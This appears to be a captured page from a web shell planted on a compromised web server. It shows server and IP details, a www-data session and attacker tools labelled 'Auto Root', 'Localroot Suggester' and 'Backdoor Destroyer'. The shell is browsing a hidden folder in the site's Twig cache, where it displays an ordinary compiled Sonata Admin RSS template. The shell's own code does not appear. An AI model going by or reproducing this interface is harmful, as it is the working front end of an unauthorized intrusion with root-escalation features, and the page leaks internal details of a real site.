Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
v3.cesa.co.za /
var /
cache /
.!!QgY /
twig /
63 /
Delete
Unzip
Name
Size
Permission
Date
Action
.htaccess
237
B
-r-xr-xr-x
2026-08-17 03:12
630e464f9dee4e6a430615f98ab893c4.php
4.84
KB
-rwxrwxr-x
2026-05-18 12:54
Save
Rename
<?php use Twig\Environment; use Twig\Error\LoaderError; use Twig\Error\RuntimeError; use Twig\Extension\CoreExtension; use Twig\Extension\SandboxExtension; use Twig\Markup; use Twig\Sandbox\SecurityError; use Twig\Sandbox\SecurityNotAllowedTagError; use Twig\Sandbox\SecurityNotAllowedFilterError; use Twig\Sandbox\SecurityNotAllowedFunctionError; use Twig\Source; use Twig\Template; use Twig\TemplateWrapper; /* @SonataAdmin/Block/block_rss_dashboard.html.twig */ class __TwigTemplate_f957cd56fa1ade4789e45fc1941b0b07 extends Template { private Source $source; /** * @var array<string, Template> */ private array $macros = []; public function __construct(Environment $env) { parent::__construct($env); $this->source = $this->getSourceContext(); $this->blocks = [ 'block' => [$this, 'block_block'], ]; } protected function doGetParent(array $context): bool|string|Template|TemplateWrapper { // line 12 return "@SonataBlock/Block/block_core_rss.html.twig"; } protected function doDisplay(array $context, array $blocks = []): iterable { $macros = $this->macros; $this->parent = $this->load("@SonataBlock/Block/block_core_rss.html.twig", 12); yield from $this->parent->unwrap()->yield($context, array_merge($this->blocks, $blocks)); } // line 14 /** * @return iterable<null|scalar|\Stringable> */ public function block_block(array $context, array $blocks = []): iterable { $macros = $this->macros; // line 15 yield " <div class=\"box box-warning\"> <div class=\"box-header with-border\"> <h3 class=\"box-title sonata-feed-title\"><i class=\"fas fa-rss\" aria-hidden=\"true\"></i> "; // line 17 yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape(CoreExtension::getAttribute($this->env, $this->source, ($context["settings"] ?? null), "title", [], "any", false, false, false, 17), "html", null, true); yield "</h3> </div> <div class=\"sonata-feeds-container list-group\"> "; // line 21 $context['_parent'] = $context; $context['_seq'] = CoreExtension::ensureTraversable(($context["feeds"] ?? null)); $context['_iterated'] = false; foreach ($context['_seq'] as $context["_key"] => $context["feed"]) { // line 22 yield " <a class=\"list-group-item\" href=\""; yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape(CoreExtension::getAttribute($this->env, $this->source, $context["feed"], "link", [], "any", false, false, false, 22), "html", null, true); yield "\" rel=\"nofollow\" title=\""; yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape(CoreExtension::getAttribute($this->env, $this->source, $context["feed"], "title", [], "any", false, false, false, 22), "html", null, true); yield "\"> <strong>"; // line 23 yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape(CoreExtension::getAttribute($this->env, $this->source, $context["feed"], "title", [], "any", false, false, false, 23), "html", null, true); yield "</strong> <div>"; // line 24 yield CoreExtension::getAttribute($this->env, $this->source, $context["feed"], "description", [], "any", false, false, false, 24); yield "</div> </a> "; $context['_iterated'] = true; } // line 26 if (!$context['_iterated']) { // line 27 yield " <div class=\"list-group-item\">No feeds available.</div> "; } $_parent = $context['_parent']; unset($context['_seq'], $context['_key'], $context['feed'], $context['_parent'], $context['_iterated']); $context = array_intersect_key($context, $_parent) + $_parent; // line 29 yield " </div> </div> "; yield from []; } /** * @codeCoverageIgnore */ public function getTemplateName(): string { return "@SonataAdmin/Block/block_rss_dashboard.html.twig"; } /** * @codeCoverageIgnore */ public function isTraitable(): bool { return false; } /** * @codeCoverageIgnore */ public function getDebugInfo(): array { return array ( 101 => 29, 94 => 27, 92 => 26, 85 => 24, 81 => 23, 74 => 22, 69 => 21, 62 => 17, 58 => 15, 51 => 14, 40 => 12,); } public function getSourceContext(): Source { return new Source("", "@SonataAdmin/Block/block_rss_dashboard.html.twig", "/var/www/v3.cesa.co.za/vendor/sonata-project/admin-bundle/src/Resources/views/Block/block_rss_dashboard.html.twig"); } }